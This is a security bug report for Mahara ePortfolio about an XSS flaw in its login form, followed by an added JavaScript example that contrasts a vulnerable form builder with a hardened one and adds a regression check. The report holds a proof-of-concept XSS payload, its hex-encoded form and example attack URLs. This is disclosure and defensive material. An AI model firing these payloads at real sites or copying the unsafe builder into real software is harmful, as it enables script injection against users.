** This bug has been flagged as a security vulnerability

https://bugs.launchpad.net/bugs/1009784

Title:
  Javascript login form includes unencoded parameters

Status in Mahara ePortfolio:
  Fix Released

Bug description:
  Discovered by Emanuel Bronshtein, present in all versions.

   Parameters from the URI are passed to JavaScript innerHTML without proper
   encoding. It is possible to use some encoding inside JavaScript strings, as:
   \x22\x3E = ">
   \u0022\u003E = ">
   By using this encoding it is possible to trigger XSS.

   Payload:
   "><h1>XSS</h1><img src=9 onerror=alert("XSS")> =
   \x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E

   XSS Example:
   http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
   http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/bulk.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
  ---

  When a logged-out user tries to access a page that requires them to be
  logged in, a login form is generated; all GET parameters are added to
  the form's action attribute & all POST parameters are added as hidden
  elements inside the form.  The login form is then inserted into the
  DOM using innerHTML.  This is for convenience, to let the user
  continue whatever it was they were trying to do if, for example, their
  session expired.  I think it may be enough to URL-encode each query
  parameter name & value in the action URL before generating the form,
  but haven't tested this yet.
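The following is an added example, not Mahara's code, showing the form-building step the description above refers to in both the vulnerable shape (request parameters concatenated straight into markup destined for innerHTML) and a hardened shape that percent-encodes every GET name and value in the action URL and then HTML-escapes every attribute value. The path, the parsed parameter objects and the helper names (buildActionUrl, buildLoginFormSafe, hasInjectedTag) are assumptions; the sample payload is the report's, decoded as a JavaScript string literal would decode its \x escapes. Percent-encoding also turns the backslash of a literal \x22 sequence into %5C, so such sequences never reach a later string context intact.

```javascript
// Added example (not Mahara's code): rebuilding a "log in and continue"
// form from an interrupted request without letting request data become markup.
// Assumes the caller has already parsed the path, GET and POST parameters.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML-escape a value so it is safe inside an attribute value or text node.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Percent-encode every GET parameter name and value (the fix the report
// suggests) and reassemble the action URL.
function buildActionUrl(path, getParams) {
  const query = Object.entries(getParams)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
  return query ? `${path}?${query}` : path;
}

// Vulnerable pattern described in the report: raw parameters concatenated
// into markup that is then handed to innerHTML. Kept only for comparison.
function buildLoginFormUnsafe(path, getParams, postParams) {
  const query = Object.entries(getParams).map(([k, v]) => `${k}=${v}`).join('&');
  const hidden = Object.entries(postParams)
    .map(([k, v]) => `<input type="hidden" name="${k}" value="${v}">`)
    .join('');
  return `<form method="post" action="${path}?${query}">${hidden}</form>`;
}

// Hardened version: URL-encode the query, then HTML-escape each attribute value.
function buildLoginFormSafe(path, getParams, postParams) {
  const action = escapeHtml(buildActionUrl(path, getParams));
  const hidden = Object.entries(postParams)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('');
  return `<form method="post" action="${action}">${hidden}</form>`;
}

// Regression check: does the markup contain any tag the template did not
// emit? Only <form>, </form> and <input ...> are expected.
function hasInjectedTag(html) {
  return /<(?!\/?form\b|input\b)[a-z]/i.test(html);
}

// Constructed sample input: the report's payload after a JavaScript string
// literal has decoded its \x escapes.
const PAYLOAD = '"><h1>XSS</h1><img src=9 onerror=alert("XSS")>';
const GET = { xss: PAYLOAD };
const POST = { returnto: PAYLOAD };

// Returns { unsafe: true, safe: false } for the sample above.
function demo(path) {
  return {
    unsafe: hasInjectedTag(buildLoginFormUnsafe(path, GET, POST)),
    safe: hasInjectedTag(buildLoginFormSafe(path, GET, POST)),
  };
}
```

The hasInjectedTag check is the kind of assertion worth keeping in a test suite for this form: it fails on the unsafe builder with the report's payload and passes on the hardened one, and it will keep failing if someone later reintroduces raw concatenation.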
